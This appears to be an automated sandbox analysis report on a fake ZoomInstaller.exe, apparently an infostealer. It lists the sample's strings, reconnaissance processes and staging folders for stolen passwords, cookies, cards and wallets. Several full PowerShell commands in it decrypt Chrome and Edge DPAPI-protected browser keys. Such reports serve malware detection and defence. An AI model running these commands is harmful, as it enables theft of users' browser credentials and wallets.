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
    Source: ZoomInstaller.exeBinary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFilePointerNetUserGetInfoGetUserNameExWTranslateNameW procedure in winapi error #: extra text: invalid syntax1907348632812595367431640625OpenSCManagerWModule32FirstWunsafe.Pointer on zero Valueunknown method.WithoutCancel.WithDeadline(RegSetValueExWLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWSizeofResourceCoInitializeExCoUninitializeSysAllocStringwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeAccept-CharsetDkim-SignatureRCodeNameErrorResourceHeaderunreachable: bad record MACneed more dataREQUEST_METHODmime/multipartControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeVirtualProtectVirtualQueryExGetShellWindowVerQueryValueWdata truncated169.150.197.118212.119.227.165109.145.173.169212.119.227.151195.181.175.105193.225.193.201212.119.227.167BEE7370C-8C0C-4DESKTOP-Z7LUJHJDESKTOP-0HHYPKQDESKTOP-TUAHF5IDESKTOP-NAKFFMTWIN-5E07COS9ALRB30F0242-1C6A-4DESKTOP-VRSQLAGDESKTOP-D019GDMDESKTOP-WI8CLETDESKTOP-B0T93D6DESKTOP-1PYKP29DESKTOP-1Y2433R6C4E733F-C2D9-4DESKTOP-WG3MYJSDESKTOP-7XC6GEZDESKTOP-5OV9S0OBinaryNinja.exevboxservice.exeUnknown versionVivaldi DefaultLiqualityWalletMaiarDeFiWalletAuthenticator_EzipinsecurepathGetMonitorInfoWBEGIN IMMEDIATEBEGIN EXCLUSIVEmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleallocmRInternalGC (fractional)write heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockruntime.Goschedmalloc deadlockruntime error: elem size wrong with GC prog
    Source: webdata.db.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get captionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get VersionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\QCFWYSKMHA VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
